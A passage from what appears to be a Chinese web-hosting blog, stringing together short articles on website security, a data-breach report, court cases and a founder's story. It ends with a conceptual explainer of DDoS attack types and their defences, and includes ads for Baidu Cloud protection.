使用安全协议(HTTPS)。 配置Web应用防火墙。 限制登录尝试次数。 禁用或保护不需要的服务器功能(如目录列表、不使用的PHP函数)。 定期修改默认端口(如SSH端口)。 定期备份: 实施自动化、异地、离线的完整备份策略。并定期测试备份的恢复能力。这是被黑后恢复的最后防线。 安全监控与扫描: 利用主机商提供的安全工具。 使用免费的网站安全扫描服务。 关注服务器和CMS的日志文件,寻找异常活动(如大量失败的登录尝试、来自异常IP的访问)。 删除或彻底下线不维护的网站: 如果网站完全不再使用且没有保留的必要,最安全的方式是彻底删除网站文件和数据库,并取消域名解析。如果只是暂时不用,至少要确保所有软件是最新的,密码极其强壮,并移除所有非必要功能。 部署web应用防火墙,有效拦截SQL 注入、XSS 跨站、Webshell 上传、非授权访问等多种 Web 服务攻击。 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 总结 “没流量”的网站被黑不是因为黑客“看上”了你的内容或流量,而是因为你的网站存在可以被自动化工具轻易利用的漏洞或弱点,成为了黑客牟取资源(服务器、带宽、存储)、进行非法活动(钓鱼、垃圾邮件、黑帽SEO)或构建攻击网络的廉价跳板。安全防护的缺失,而非流量的有无,才是被黑的根本原因。 务必对任何暴露在互联网上的资产实施基本的安全防护措施。 网站的安全程度,往往取决于它最薄弱的那次更新疏忽。 安全不是奢侈品,而是互联网生存的必需品——哪怕你的站点看似无人问津,黑暗中的扫描器永远在寻找下一个敞开的门。 #### 一个站长因为采集美术作品被起诉,需要赔100万! 如果你的网站还在做采集内容的,要小心啦,可能面临侵权官司。 最近主机吧从站长论坛了解到,一位站长就中招了,网站因采集了某文化传播公司的美术作品,被告侵权,面临赔偿100多万! 三年时间,19起侵权纠纷! 站长更是因为还不起钱,被限制高消费! 可以说倾家荡产啊!所以采集的站长千万要小心啦。 我们再来看看案件。 从上面的判决书我们可以看到,该站长主要是网站使用了侵权的图片,被判赔了64000元,这还只是其中 案件,主机吧了解到,目前美术著作权申请几十块钱一个,也可以说申请一个图片版权,只需要几十块,然后别人拿了你的图片,没有经过授权就可以去告他了,目前简直是一本万利啊!估计很多碰瓷公司都这样玩,站长们要小心啦,别乱用网上的图片,要用图片就到国外免版权图片网站找。 #### 一个黑客组织入侵10家公司,在暗网出售超7300万用户数据 5月11日 消息:据外媒报道,一个名为ShinyHunters的黑客组织声称已经入侵了 10 家公司,目前正在一个暗网市场上出售超过 7300 万用户用户数据库。 上周,印尼最大在线商店Tokopedia也遭同一黑客组织攻击。最初,该黑客组织在网上免费分享了 1500 万份用户记录,之后则以 5000 美元的价格出售Tokopedia共 9100 万份用户记录的整个数据库。 现在,这个黑客组织打算继续出售另外 10 家公司的数据库,列出的数据库总共有 7320 万份用户记录,黑客总共大概以1. 8 万美元的价格出售,每个数据库可单独出售。 该组织窃取的用户数据库涉及的公司包括: 在线交友应用Zoosk( 3000 万用户记录) 印刷服务Chatbooks( 1500 万用户记录) 韩国时尚平台SocialShare( 600 万用户记录) 送餐服务Home Chef( 800 万用户记录) 在线市场 Minted ( 500 万用户记录) 在线报纸Chronicle of Higher Education( 300 万用户记录) 韩国家具杂志GGuMim( 200 万用户记录) 健康杂志Mindful( 200 万用户记录) 印尼在线商店Bhinneka( 120 万用户记录) 美国报纸 StarTribune( 100 万用户记录) #### 一分钟了解CC攻击以及防御方式   CC攻击: 应用层DDoS攻击,对站点,尤其是访问需要大量数据操作的应用,如“查询“操作,耗应用层资源,导致站点业务访问缓慢,甚至无法访问。 遭遇应用层CC攻击,业务访问缓慢应该怎么办? 禁止网站代理访问,尽量将网站做成静态页面,限制连接数量,修改最大超时时间等。 使用WAF产品进行人机验证及CC攻击防护,比如百度云加速。   #### 一名普通女孩建站创业的经历 我是一个看上去娇小斯文的苏州女孩,目前是一名网络公司的创始人,从学校兼职到如今创业已经在这个残酷的社会打拼五年,遇到过质疑和挑战,但不变的是初心,从最初的而最终还是选择了互联网,因为它开拓了我的见识,也让我认识了许多可爱的网络行业朋友,并带给了我事业、成就感和充实丰富的人生。 上学时候稚嫩的我 从兼职到到走出校门的迷茫 因为是生活在园林之城,读书时期就有一个梦想:当一名空间设计师。可高考时,因落榜名校建筑设计专业而误打误撞读了本地学校的计算机。正当其他同学在沉迷游戏谈恋爱的时候,我是按奈不住活泼的本性,就去兼职了。 一段时间后,我发现这不是我要的,虽然有些迷茫,但是我不甘心,因为我的心底,深藏着梦想。梦想暂时不确定,是当一名程序猿、作家,还是一名歌手(我从小就喜欢歌唱)?总之不是这种左手右手一个慢动作、洗盘子拖地或者服装店里站岗。 因为每天要接触电脑,首先考虑先做网站吧,然后和大多数接触互联网的朋友一样,首先做网站赚广告费,开始的时候先是就先使用开源程序搭建简单的网站制造内容,就这样每天关注热点拼凑内容,后来发现大部分广告联盟都比较坑,虽然赚了一点点,但是这样的速度太慢了,努力几个多月才100多美元。 谷歌广告的汇丰银行支票 奋斗让我闪亮 时间飞逝,一眨眼就离开学校了,都说销售可以改变命运所以还是先告诉自己选择一个装修互联网平台做销售,刚开始面试的时候,销售总监说我看起来很内向不太适合做销售,我跟他说我只是有点慢热和紧张,其实我不内向,希望能给一次机会。爱吃的女孩运气都不会太差,因为食来运转嘛,这样就开始了第一份正式工作。 有组织的感觉还是充满乐趣的 装修平台前期主要做的是找到建筑行业相关企业拉注册,稳定活跃度,部门领导每天会把20多人中的前三名发到公司100多人的群里,也是比较要强吧,特别享受每天第一的感觉,就不断加装修建材行业的QQ群拉好友,乐死不疲地发帖子找给他们介绍,每天加班到十一二点,偶尔实在太晚在公司趴着眼睛一睁都天亮了。努力让我长期保持在每天20个新注册保持第一。然后薪水也就在6000多每个月,还是离自己的目标差之甚远。因此我向领导提出升职加薪的要求,领导问我会什么,我搬出之前在学校引流赚美刀的事情,然后就让我尝试网站运营,这件事情我简单把线上的工作分成两个部分,就是站内和站外。 站内先是 1、分栏目检测死链接; 2、把关键词布置到栏目和内链; 3、规划专题让内容部门不断输入原创; 4、每天催促领导让技术部把修改项目往前排。 站外是 1、刷高权重; 2、不断更替低权重链接; 3、刷全站重点词发包。 从短期见效角度选择了砍蛇砍七寸,没有去做品牌。 做了两个月的排名还是有一些提升 两个多月的时候,初现成效,领导也比较满意,这时候的我薪水也翻翻超过万元,开始享受生活,但渐渐也觉得应该做点什么让自己有所突破。 时间流逝,可能有些网络朋友会和我一样,在一个公司稳定了几年,看着身边一些朋友开淘宝结合实体、做网络项目卖软件月入十万的比比皆是,微信小程序让一个接着一个个公司融资一轮又一轮,短视频带货的朋友房贷都还清了,这才发现,自己没有跟上新媒体和各种新渠道的出现,安逸的环境让自己停止了进步,但几年也有了一些积蓄,我想了几天还是选择了离职,老板虽然也极力挽留,但我想走出舒适圈。 创业就要分析市场需求和自身优劣势来选择产品,因为最熟悉的还是建站优化,而目前推广渠道那么分散,并且变化也很快,那么我为什么还是选择了网站建设?因为我分析目前企业主要么两种情况,一是有网站,但时间久了,要么需要从新建站,要么需要改版;二是没有网站,直接想去做小程序、APP、短视频,但其实真正能够跳过网站直接烧平台的中小企业能在互联网存活的寥寥无几。 做不了新渠道的龙头,就结合老渠道做凤尾吧,新公司的思路就是建站送小程序和搜索霸屏、建站送行业媒体、建站送短视频,把同行的所有渠道都拿过来送给用户,我是不是很明智?我是东坡大七,希望一样是互联网行业的朋友可以一起交流,多多合作,谢谢! 作者:张琪 QQ:243456745 #### 一名软件工程师猝死 愿天堂没有代码 2015年杨某某进入湖南科创信息技术股份有限公司工作,任软件工程师,工作地点在长沙。2020年3月11日,杨某某受公司安排派往湘潭县出差,参与互联网+政务服务项目。在安排去湘潭出差前,杨某某参与的是中南大学湘雅二医院网站系统维护及加密项目,对系统进行实施及维护。该项目是一个7×24小时运行的系统,一旦出现问题,系统会自动发短消息通知,需要及时进行处理。作为实施维护系统的负责人,系统与杨某某的手机进行了绑定,系统的问题会自动发送至杨某某手机,以保证系统正常运维。杨某某去湘潭县参与“互联网+政务服务”一体化平台项目后,依然兼任湘雅二医院网站系统维护及加密项目的维护工作,系统也没有对他的手机进行解绑,系统出现问题时需要杨某某远程处理。科创信息于2019年9月17日在湘潭县租了房屋供出差员工使用。事发时,房屋内住了杨某某和曾某某(科创信息员工)。2020年4月2日晚上21点10分左右,两人离开项目现场,一同步行回到公司租的房屋中,21点20分左右回到房屋后回各自房间没有外出。4月3日早上同住同事曾某某去上班,10点多发现杨某某没去项目现场上班,发信息未回打电话也未接,把情况告知了湘潭市项目经理徐某某,准备中午回宿舍看看。中午曾某某带着给杨某某订的盒饭从政务中心回宿舍查看情况,叫杨某某没有答应,于是拨打了120,同时告知项目经理徐某某。中午12点40分左右,120医护人员到现场进行了心肺复苏抢救,没有效果,当场确认杨某某已无生命体征。徐某某到现场后拨打了110报警。湘潭县易俗河镇天易派出所民警到达宿舍现场后,经现场技术勘查和外部检查,确定人已死亡,且未发现外伤。派出所电话通知湘潭县人民医院来接运遗体。晚上8点多,由警察组织在天易派出所召开了家属、单位参与的情况通报会,通报死亡原因:经现场勘查及调查,可排除他杀和食物中毒,杨某某符合猝死征象。科创信息于2020年5月20日向长沙市人社局提交了《长沙市工伤认定申请表》及工伤认定所需材料,市人社局收到材料后,于当日作出《工伤认定受理决定书》。市人社局经调查,于2020年7月8日作出(2020)长人社工伤不予认字07003号《不予认定工伤决定书》并送达。科创信息不服,诉至法院。一审裁决 根据《工伤保险条例》第五条第二款规定,“县级以上地方各级人民政府社会保险行政部门负责本行政区域内的工伤保险工作”,市人社局作为社会保险行政部门,具有对本辖区内单位职工进行工伤认定的法定职权。根据《最高人民法院关于职工因公外出期间死因不明应否认定工伤的答复》(【2010】行他字第236号),职工因公外出期间死因不明,用人单位或者社会保障部门提供的证据不能排除非工作原因导致死亡的,应当依据《工伤保险条例》第十四条第(五)项和第十九条第二款的规定,认定为工伤。本案中,杨某某系因公外出期间死亡,原告科创信息技术公司提供的湘潭县公安局天易派出所出具的死亡证明,仅证明杨某某符合猝死征象,排除他杀,对杨某某死亡的原因并未进行说明。杨某某死亡原因不明确。原告科创信息技术公司和被告市人社局提供的现有证据不能排除杨某某系非工作原因导致死亡。被告市人社局关于杨某某在租住房屋内死亡时虽在因工外出期间,但其死亡并非由于工作原因受到伤害所致,杨某某的死亡不符合《工伤保险条例》第十四条第(五)项规定的情形的主张没有事实及法律依据,法院不予支持。综上,市人社局作出的(2020)长人社工伤不予认字07003号《不予认定工伤决定书》依据的主要证据不足,适用法律、法规错误,依法应予撤销,杨某某的死亡应认定为工伤。依照《中华人民共和国行政诉讼法》第七十条第(一)、(二)项的规定,判决如下:一、撤销被告长沙市人力资源和社会保障局于2020年7月8日作出(2020)长人社工伤不予认字07003号《不予认定工伤决定书》;二、责令被告长沙市人力资源和社会保障局于本判决生效之日起六十日内对原告湖南科创信息技术股份有限公司的工伤认定申请重新作出工伤认定决定。二审 上诉人长沙市人力资源和社会保障局上诉称:一审法院认定事实不清,杨某某系在晚上休息时猝死,不属于工作时间工作岗位突发疾病或工作原因死亡,不符合应当认定工伤的情形;一审法院适用法律错误,杨某某死亡并非工作原因,不符合《工伤保险条例》第十四条第(五)项“因公外出期间,由于工作原因受到伤害或者发生事故下落不明的”规定,亦不符合《工伤保险条例》第十四条其他规定。一审判决加重市人社局举证责任,无事实及法律依据,适用相关答复错误。综上所述,请求二审法院依法查明事实,判决:1.撤销长沙铁路运输法院2020年10月29日作出的(2020)湘8601行初999号行政判决书,维持上诉人市人社局于2020年7月8日作出的(2020)长人社工伤不予认字07003号《不予认定工伤决定书》,诉讼费由被上诉人承担。被上诉人湖南科创信息技术股份有限公司答辩称:所提交的工伤申报材料均可证实杨某某前往湘潭系出差,系因工外出,其死因不明且上诉人无任何证据证明杨某某系睡觉时死亡,因此应当被认定为因工作原因死亡。综上所述,杨某某死亡应当被认定为工伤。二审裁决 根据本案证据,杨某某系科创信息技术公司员工,工作地点为长沙,其受公司安排,派往湘潭县出差。杨某某因公外出期间死亡,用人单位或者社会保障部门提供的证据不能排除杨某某系非工作原因导致死亡,根据《最高人民法院关于职工因公外出期间死因不明应否认定工伤的答复》,长沙市人社局对此不予认定工伤证据不足。长沙市人社局上诉主张杨某某不属于因公外出,亦不属于工作时间工作岗位突发疾病或工作原因死亡,缺乏事实根据,不予支持。一审法院认定事实清楚、适用法律正确,应予维持。上诉人的上诉理由缺乏事实及法律依据,本院不予支持。依照《中华人民共和国行政诉讼法》第八十九条第一款第(一)项的规定,判决如下:驳回上诉,维持原判。 #### 一团网疑似已关站 今年8月的时候一团网就发过公告,大意是因业务发展将在8月15日停止运营。 不过第二天这个公告又撤下了。 当时主机吧还以为找到下家了,现在看来是彻底关闭了,今早登陆查看后,网站已经打不开了。 公开资料显示一团网是国内知名网站A5站长网旗下站长团购平台,提供软件类、源码类、IDC类、站长类、培训类等网络资源。曾经人气一度火爆,不过随着手机视频的崛起,这类团购网站已经大不如前了, 这类网站的关闭,也意味着网站建设的没落,未来网站的该如何运营,如何持续下去,有待我们思考。 最新消息:一团网是因为注销了备案,正在重新备案中。 不过这么一个大型网站,说关就关,可想而知现在一团网的业务有多少了…… #### 一客户因为被CC攻击骚扰将关闭网站 国内做网站环境越来越难了,不仅是因为网站获取免费流量的渠道少了,还有因为国内互联网监管也越来越严,更有是国内网站攻击特别多。 多到什么程度呢?这样说吧,国内有三分之一的网站都有遇到过不同程度的攻击,其中以DDOS攻击最为简单暴力,而你也毫无办法,只能购买防御进入抵抗,而国内DDOS防御各服务商都不同,效果也不同,但总体来说想要防御一个中大型的攻击的话,价格都是昂贵的。几百几千甚至几万一个月不等。 这不主机吧一个客户因为多次被CC攻击高达上亿次,没钱升级被百度云加速封停了。其实百度云加速还是很良心的,这位客户的套餐已经多次被攻击超量了,都没有处理,实在是攻击量太大,不得不处理了。 百度云加速的意思是升级后才可以解封,而升级企业版即使是主机吧作为代理价格也要一万多一年,这个价格对于一个本来就不盈利的网站来说几乎是添加,客户肯定是付不起的,无奈这下客户选择了关站处理。 看到这里主机吧虽然很遗憾,但也是没办法的事情,国内网站运营环境越来越差,监管压力,流量压力,安全压力就像一座大山压着,很多站长干脆放弃做网站去运营公众号、自媒体去了。这里衷心希望新的一年里,各位站长能越来越好! #### 一年损失 90 亿美元,Netflix 再次测试打击“共享帐户密码”行为 1 月 3 日消息,据 MSPoweruser 报道,去年 3 月,Netflix 开始测试对帐户密码共享的打击,该公司挑战用户,如果他们怀疑你没有使用自己的账户,就会要求你输入手机或电子邮件收到的安全代码进入应用程序。 Netflix 说:“这项测试的目的是帮助确保使用 Netflix 账户的人得到授权。” 当时,这项测试没有任何结果,但今天有意大利网站报道说,警告再次传递给意大利用户。 IT之家获悉,报道称,Netflix 每年因密码共享而损失 90 亿美元,但据推测,他们也知道,如果不能将价值分摊给一些用户,特别是如果影响了用户的使用体验,他们的大量用户就不会购买订阅。 新的举措是否意味着 Netflix 将再次尝试杜绝密码共享,以及是否会扩展到意大利以外的地区,还有待观察。希望这家高高在上的 Netflix 公司能够意识到被视为利于消费者的举措,尤其是在市场上已经有这么多竞争者的情况下。 #### 一德国程序员因报告漏洞被判“黑客罪行”罚款 3000 欧元 一名德国程序员Hendrik H.因未经授权访问第三方计算机系统和刺探数据,违反了《德国刑法典》(StGB)中的黑客条款202a,并被处以3000欧元的罚款(约2.35万元)。 这位程序员在为IT服务公司Modern Solution GmbH的客户解决软件故障时,发现该公司的代码通过MySQL连接到一台MariaDB数据库服务器。远程服务器的密码以纯文本形式存储在程序文件MSConnect.exe中,任何人都可以使用简单的文本编辑器打开文件查看内容,并找到未加密的硬编码密码。 在发现漏洞后,这名程序员在技术博客作者Mark Steier的协助下联系了相关公司,后者随后修复了安全漏洞,并向警方报告了这名程序员的行为。然而,Modern Solution指控他通过内部信息获取密码,并声称他是竞争对手。2021年9月,德国警方扣押了Hendrik H.的电脑,因为Modern Solution指控他“通过内部信息”获得的密码,并声称他是竞争对手。 2023年6月,德国于利希地方法院支持Hendrik H的诉讼请求,理由是Modern Solution的软件保护不力。然而,亚琛地区法院要求利希地方法院重新审理此案,并推翻了原先的裁定。最终,于2024年1月17日,利希地方法院宣判对Hendrik H.处以罚款,并责令其支付诉讼费用。 这一判决在广大网络安全专家和研究人员中引起了争议,因为这名程序员是在发现漏洞后,主动向相关公司报告的,而非恶意攻击。 #### 一文全面解决网站被攻击解决办法 网站被攻击怎么办?作为一名站长,网站被攻击,总是在所难免。特别是一些个人或小企业网站,由于没有专业的程序员维护,三天两头打不开,被整的焦头烂额。不过面对网站攻击并不是束手无策而坐以待毙,网站被攻击恰恰说明网站存在安全漏洞,只要查缺补漏,加以防范,便可保持网站的正常运行。网站之所以存在漏洞,是因为电脑系统或网站程序不断被发觉新漏洞,不是很专业的程序员疏于防范,便给一些不法之徒带来可乘之机。为此,网站运维不是一个简单的事,需要程序员的专业技术、管理习惯、责任心息息相关。 一、网站被攻击的常见形式: (一)网站网页被挂马:当我们打开网站网页时,会被浏览器或电脑安全管理软件提示,此网站存在风险、此网站被挂马等报告,是因为网页和根目录文件中被植入了js,当打开网页时,触发js的命令,自动执行含有木马的脚本或php文件,从而窃取用户的隐私数据。被攻击的网站往往是一些涉及虚拟货币或有交易性质的网站。 (二)网站网页中出现大量的黑链:网站的网页一般用户看着没有什么异常,但是在网站的源代码中,往往是在最底部,出现了大量的锚文本链接,而这些链接往往被隐藏起来,字体大小为0或极限便宜位置。被攻击的目的在于,一些黑客非法植入链接,来提高一些低权重网站的权重和流量而获取利益,而被攻击方的网站往往会被降权惩罚。被攻击的网站往往是一些存在一定搜索引擎权重和流量的网站。 (三)网站根目录中出现大量植入的网页:如果网站维护不及时,会发现网站收录突然暴增,而收录的内容都是非自身网站的内容,大多数是一些非法广告页面,诸如博彩、色情、游戏私服外挂等内容,我们检查服务器网站数据会发现大量植入的静态页。被攻击的网站广泛,特别是一些流量高的网站备受黑客青睐。 (四)网站网页打开自动跳转到其它网站页面:这种形式我们常常称之为非法桥页,在网页中植入的强制转的js,或入侵服务器,在iis中做了301重定向跳转,其目的在于黑客进行一些非法广告性或网站权重转移而从中获益。被攻击的对象往往是一些有权重、有流量的网站。 (五)网站数据库被植入新内容。网站数据被植入了一些新增加的内容,这些内容形式和网站其他数据看似正常,但是看时间日期,会发现内容往往比较集中,而并不是编辑人员添加的内容。这种网站往往是一些能够办理证件的网站,诸如职业资格证、毕业证等。黑客为一些非法客户在正规官网植入虚假职业信息,而从中获取高额利益。被攻击的网站往往是一些大学官网、教育部门网站或一些资质认定的网站。 (六)网站被攻击打不开会打开极为缓慢:网站网页经常打不开,或服务器无法远程连接,这种情况往往是由于企业竞争激烈,非法的竞争对手雇佣网络黑客,恶意攻击自己的网站程序和服务器,导致网站或服务器无法正常运行,诸如大量的DDoS攻击、CC攻击、直接破坏或删除网站数据。部分黑客存在心理扭曲、炫耀自己的能力进行恶意攻击。被攻击的网站往往是企业网站或一些维护水平较低存在大量安全漏洞的网站。 (七)网站和服务器密码被篡改:有时会发现网站和服务器的密码不正确,被篡改了。是因为黑客对存在漏洞的网站和服务器进行暴力破解,篡改了密码。其目的往往在于炫耀黑客技术能力,进行恶意的、非法的黑客技术操作。被攻击的网站甚至影响服务器里的所有网站。 (八)网站数据库丢失或损坏:有时发现自己的网站可以正常打开,但是无法再继续更新程序和新添加内容。这种情况往往是一些缺乏职业道德的离职程序员或黑客,进行恶意的攻击网站。被攻击的网站为各类网站。 (九)网站域名DNS劫持:打开自己的网站,内容却不是自己的网站内容,检查服务器和网站程序均正常,这种情况我们ping网站ip到时候已经不是自己的服务器ip,这种情况往往存在域名DNS劫持。其目的在于恶意的攻击炫耀或广告利益。被攻击的网站为所有类网站。 (十)网站服务器运行缓慢,被植入蠕虫等病毒:有时候站长会发现网站运行更新或在服务器操作异常缓慢,我们查看服务器的进程管理会发现,有运行占据高CPU、高内存的进程。这是查杀木马,往往会查出蠕虫等病毒。其目的在于占据网站资源,或服务器自身被攻击入侵,作为一种“肉鸡”用来攻击其他人的平台。被攻击网站,往往是一些高性能、高带宽的服务器。 二、网站服务器如何运维: (一)网站数据定期备份:定期备份网站数据可以用来恢复被攻击的网站,即便网站被攻击或误操作删除一些网站信息,可随时恢复。为此网站运维,网站备份才是硬道理。 (二)网站程序系统更新:网站程序和服务器系统定期更新使用的版本、补丁,可消除一些存在的安全漏洞,以防给黑客带来可趁之机。 (三)定期查杀网站病毒:定期查杀网站病毒可以防止黑客的进一步破话或窃取网站数据,也可以及时删除入侵的网站后门漏洞文件。 (四)网站文件权限设置:对网站服务器文件合理的设定权限,比如部分执行程序的重要文件应当取消写入或执行权限,可避免黑客篡改网站数据。 (五)网站域名开启https数据安全传输协议和cdn加速,开启https和cnd,可以更快的、安全的运行网站,可以隐藏自己的网站真实ip,一定程度上预防DDoS攻击、CC攻击、域名劫持等安全隐患。网站如何防御DDos攻击和CC攻击? (六)可使用高防服务器:高防服务器具有高性能、高带宽、高防御的特点,在安全上、运行上自身具备一定维护的基础后盾,给后期维护带来了不少的方便,也可以使用高防CDN,比如百度云加速具备1Tbps的压制能力的抗D中心,拥有自有DDoS/CC清洗算法,可有效帮助网站防御SYN Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Proxy Flood、CC等常见的洪水攻击。从而彻底解决了中小型网站在面对DDoS攻击时预算不足的尴尬,也为所有防护网站的稳定运行提供保障。客户应当根据自己经济情况酌情考虑。 (七)定期更新管理密码:网站密码可被离职程序员记录或黑客入侵暴力破解获取,定期更新网站后台密码和远程服务器登陆密码可有效预防数据损失。 (八)定期查看网站日志:网站运行数据的记录都在网站日志里记载,开启并定期查看网站日志,清晰地了网站运行的轨迹,是网站维护的重要方式之一。   以上就是网站常见的攻击形式和常见维护方式,希望能给站长带来一定的帮助! #### 一文解读什么是ddos?ddos攻击的手段与有哪些防御方法 DDoS 攻击究竟是什么? 开门见山,举个形象点的例子 我开了一家有五十个座位的重庆火锅店,用料上等,童叟无欺。平时门庭若市,生意特别红火,而对面二狗家的火锅店却无人问津。二狗为了对付我,想了一个办法,叫了五十个人来我的火锅店坐着却不点菜,让别的客人无法吃饭。 上面这个例子讲的就是典型的 DDoS 攻击,全称是 Distributed Denial of Service,翻译成中文就是分布式拒绝服务。一般来说是指攻击者利用 “肉鸡”(所谓肉鸡就是网络上被攻陷的计算机) 对目标网站在较短的时间内发起大量请求,以大量无用的数据消耗有限的网络资源和服务器系统资源,让目标网站无法正常服务(轻则网络阻塞,重则服务器系统崩溃,导致死机)。在线游戏、互联网金融等领域是 DDoS 攻击的高发行业。 在 DDoS 黑色产业链中,各个角色是如何分工的? DDoS 攻击犯罪已经进入产业化时代,从需要专业不法黑客实施全部攻击过程的行为,发展成由发单人、攻击实施人、肉鸡商、出量人、不法黑客攻击软件作者、担保人等多个犯罪个体共同参与实施的产业化犯罪行为。 发单人:DDoS 攻击黑色产业链中顶端的角色,也就是出资并发出对具体网站或服务器的攻击需求的人攻击实施人:接到 “发单人” 指令并执行攻击的人肉鸡商:侵入计算机信息系统的实施人,或者买卖被侵入计算机系统权限的中间商。出量人:拥有服务器控制权限和网络流量的人。他们有一定技术能力,能够租用专属服务器并自行配置攻击软件从而获取流量担保人:业内“信誉”较高的不法黑客。因为交易的双方往往并不认识,于是他们会找到 “担保人”,负责买卖双方的资金中转,担保人可从中抽取一定的好处费。 DDoS 攻击手段具体有哪些? ICMP Flood ICMP 用于在 IP 主机、路由器之间传递控制消息,控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息,虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。通过对目标系统发送海量数据包,就可以令目标主机瘫痪,如果大量发送就成了洪水攻击。 UDP Flood UDP 协议是一种无连接的服务,伪造源地址很方便。在 UDP Flood 中,攻击者通常发送大量伪造源 IP 地址的小 UDP 包冲击 DNS 服务器或 Radius 认证服务器、流媒体视频服务器。100k bps 的 UDP Flood 经常将线路上的骨干设备例如防火墙打瘫,造成整个网段的瘫痪。 上述两种传统的流量型攻击方式技术含量较低,伤人一千自损八百,攻击效果通常依赖受控主机本身的网络性能,而且容易被查到攻击源头,单独使用的情况已不常见。于是,具有四两拔千斤效果的放射型放大攻击就出现了。 NTP Flood NTP 是标准的基于 UDP 协议传输的网络时间同步协议,由于 UDP 协议的无连接性,方便伪造源地址。攻击者使用特殊的数据包,也就是 IP 地址指向作为反射器的服务器,源 IP 地址被伪造成攻击目标的 IP,反射器接收到数据包时就被骗了,会将响应数据发送给被攻击目标,耗尽目标网络的带宽资源。一般的 NTP 服务器都有很大的带宽,攻击者可能只需要 1Mbps 的上传带宽欺骗 NTP 服务器,就可给目标服务器带来几百上千 Mbps 的攻击流量。 因此,“问-答”方式的协议都可以被反射型攻击利用,将质询数据包的地址伪造为攻击目标地址,应答的数据包就会都被发送至目标,一旦协议具有递归效果,流量就被显著放大了,堪称一种“借刀杀人”的流量型攻击。 SYN Flood 这是一种利用 TCP 协议缺陷,发送大量伪造的 TCP 连接请求,从而使得被攻击方资源耗尽(CPU 满负荷或内存不足)的攻击方式。建立 TCP 连接,需要三次握手:客户端发送 SYN 报文,服务端收到请求并返回报文表示接受,客户端也返回确认,完成连接。 SYN Flood 就是攻击者客户端在短时间内伪造大量不存在的 IP 地址,并向目标服务器不断地发送 SYN 包,Server 则回复确认包,并等待客户端确认,由于源地址不存在,因此目标服务器需要不断重发直至超时,这些伪造的 SYN 包将长时间占用半连接队列,导致正常的 SYN 请求因为队列满而被丢弃,从而引起网络拥塞甚至系统瘫痪。 CC 攻击 CC 攻击是目前应用层攻击的主要手段之一,借助【代理服务器】生成指向目标系统的合法请求,实现伪装和 DDoS。 我们都有这样的体验,访问一个静态页面,即使人多也不需要太长时间,但如果在高峰期访问论坛、贴吧等,那就很慢了,因为服务器系统需要到数据库中判断访问者否有读帖、发言等权限。访问的人越多,论坛的页面越多,数据库压力就越大,被访问的频率也越高,占用的系统资源也就相当可观。 CC 攻击就充分利用了这个特点,模拟多个正常用户不停地访问如论坛这些需要大量数据操作的页面(HTTP Flood),造成服务器资源的浪费,CPU 长时间处于 100%,永远都有处理不完的请求,网络拥塞,正常访问被中止。这种攻击技术性含量高,见不到真实源 IP,见不到特别大的异常流量,但服务器就是无法进行正常连接。 之所以选择代理服务器是因为代理可以有效地隐藏自己的身份,也可以绕开防火墙,因为基本上所有的防火墙都会检测并发的 TCP/IP 连接数目,超过一定数目一定频率就会被认为是 Connection-Flood。当然也可以使用肉鸡来发动 CC 攻击,攻击者使用 CC 攻击软件控制大量肉鸡发动攻击,肉鸡可以模拟正常用户访问网站的请求伪造成合法数据包,相比前者来说更难防御。 CC 攻击是针对 Web 服务在应用层发起的攻击,在越上层协议上发动 DDoS 攻击越难以防御,上层协议与业务关联愈加紧密,防御系统面临的情况也会更复杂。 由于 CC 攻击成本低、威力大,80% 的 DDoS 攻击都是 CC 攻击。 DNS Query Flood DNS 作为互联网的核心服务之一,自然也 是DDoS 攻击的一大主要目标。 DNS Query Flood 采用的方法是操纵大量傀儡机器,向目标服务器发送大量的域名解析请求。服务器在接收到域名解析请求时,首先会在服务器上查找是否有对应的缓存,若查找不到且该域名无法直接解析时,便向其上层 DNS 服务器递归查询域名信息。 通常,攻击者请求解析的域名是随机生成或者是网络上根本不存在的域名,由于在本地无法查到对应的结果,服务器必须使用递归查询向上层域名服务器提交解析请求,引起连锁反应。解析过程给服务器带来很大的负载,每秒钟域名解析请求超过一定的数量就会造成 DNS 服务器解析域名超时。 根据微软的统计数据,一台 DNS 服务器所能承受的动态域名查询的上限是每秒钟 9000 个请求。而一台 P3 的 PC 机上可以轻易地构造出每秒钟几万个域名解析请求,足以使一台硬件配置极高的 DNS 服务器瘫痪,由此可见 DNS 服务器的脆弱性。 混合攻击 在实际情况中,攻击者只求达到打垮对方的目的,发展到现在,高级攻击者已经不倾向使用单一的攻击手段作战了,而是根据目标系统的具体环境灵动组合,发动多种攻击手段,既具备了海量的流量,又利用了协议、系统的缺陷,尽其所能地展开攻势。 对于被攻击目标来说,需要面对不同协议、不同资源的分布式的攻击,分析、响应和处理的成本就会大大增加。 如何应对 DDoS 攻击? 高防服务器 还是拿最开始重庆火锅店举例,高防服务器就是给重庆火锅店增加了两名保安,这两名保安可以让保护店铺不受流氓骚扰,并且还会定期在店铺周围巡逻防止流氓骚扰。 高防服务器主要是指能独立硬防御 50Gbps 以上的服务器,能够帮助网站拒绝服务攻击,定期扫描网络主节点等,这东西是不错,就是贵 黑名单 面对火锅店里面的流氓,我一怒之下将他们拍照入档,并禁止他们踏入店铺,但是有的时候遇到长得像的人也会禁止他进入店铺。这个就是设置黑名单,此方法秉承的就是 “错杀一千,也不放一百” 的原则,会封锁正常流量,影响到正常业务。 DDoS 清洗 DDos 清洗,就是我发现客人进店几分钟以后,但是一直不点餐,我就把他踢出店里。 DDoS 清洗会对用户请求数据进行实时监控,及时发现 DOS 攻击等异常流量,在不影响正常业务开展的情况下清洗掉这些异常流量。 CDN 加速 CDN 加速,我们可以这么理解:为了减少流氓骚扰,我干脆将火锅店开到了线上,承接外卖服务,这样流氓找不到店在哪里,也耍不来流氓了。 在现实中,CDN 服务将网站访问流量分配到了各个节点中,这样一方面隐藏网站的真实 IP,另一方面即使遭遇 DDoS 攻击,也可以将流量分散到各个节点中,防止源站崩溃。 推荐产品 1.百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。百度云加速正为数十万用户的近百万网站提供CDN、网络安全和SEO服务。每天处理十亿级的PV流量及数百亿TB的数据流量,并提供市场顶尖水平的稳定性和抗攻击能力。 优惠链接:https://zhujib.com/yunjiasu.html 2.京东云星盾 星盾安全加速(SCDN,Secure Content Delivery 